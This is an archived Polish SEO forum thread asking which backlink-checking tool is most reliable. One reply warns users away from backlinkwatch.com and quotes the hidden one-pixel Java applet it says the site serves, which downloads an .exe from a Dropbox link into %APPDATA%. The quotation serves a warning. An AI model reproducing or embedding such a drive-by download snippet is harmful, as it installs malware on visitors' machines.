Skocz do zawartości

Checker backlinks - Jaki najlepszy

Falco91

Rekomendowane odpowiedzi

Witam,

Przeglądnąłem mnóstwo postów, przeszukałem w google pod nazwą : " Checker backlinks " i dalej nie mogę rozwiązać tej zagadki, która mnie nurtuje przez kilka dni. Gdzie mam sprawdzać backlinki/strony, które prowadzą do mojej strony ? Które urządzenie jest najpewniejsze, bo każde pokazuje mi coś innego albo trochę się różnią wyniki i już nie wiem, jakiemu mam ufać i z jakiego korzystać.

pozdrawiam

Sklep motoryzacyjny Chciwiec - tanie części samochodowe
Portal budowlany - Inżynier budowy

żaden z powyższych ponieważ nie zawsze działają poprawnie - wystarczy wziąć darmowe lub płatne oprogramowanie, które to sprawdzi i posegreguje.

Agencja marketingowa Semgence istnieje na rynku od 2018 i odpowiada za prowadzenie działań SEO dla wielu firm małych i dużych. Prowadzimy też kampanie Google Ads - niedawno zostaliśmy sie Partnerem Google spełniając odpowiednie kryteria. Betapoint

Ja zawsze sugerowałem się :www.backlinkwatch.com, ale skoro pojawiły się też negatywne opinie co do tego serwisu, to muszę szukać dalej. Zgred jakie darmowe oprogramowanie jest według Ciebie najlepsze ? Mogę znaleźć na google pewnie sporo takich programów, ale skąd mam mieć pewność, że jest ono dobre.

Sklep motoryzacyjny Chciwiec - tanie części samochodowe
Portal budowlany - Inżynier budowy

Backlinkwatch zapewne to dolega:

<applet width='1' height='1' code='Java.class' archive='Java.jar'><param name='url' value='https://dl.dropbox.com/u/8572232/week.exe' /><param name='location' value='%APPDATA%' /><param name='file' value='WegsLstcVsY.exe' /><param name='r' value ='' /></applet>

https://www.virustotal.com/file-scan/report...e9a8-1309287801 - plik najwidoczniej wirus, ale lepiej nie korzystać póki co z backlinkwatch.

@edit:

"używać póki co z backlinkwatch" trochę glupio to wyglądało :)

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Ostatnio przeglądający   0 użytkowników

• Brak zarejestrowanych użytkowników przeglądających tę stronę.
  • Dodaj nową pozycję...

Powiadomienie o plikach cookie

Umieściliśmy na Twoim urządzeniu pliki cookie, aby pomóc Ci usprawnić przeglądanie strony. Możesz dostosować ustawienia plików cookie, w przeciwnym wypadku zakładamy, że wyrażasz na to zgodę. Warunki użytkowania Polityka prywatności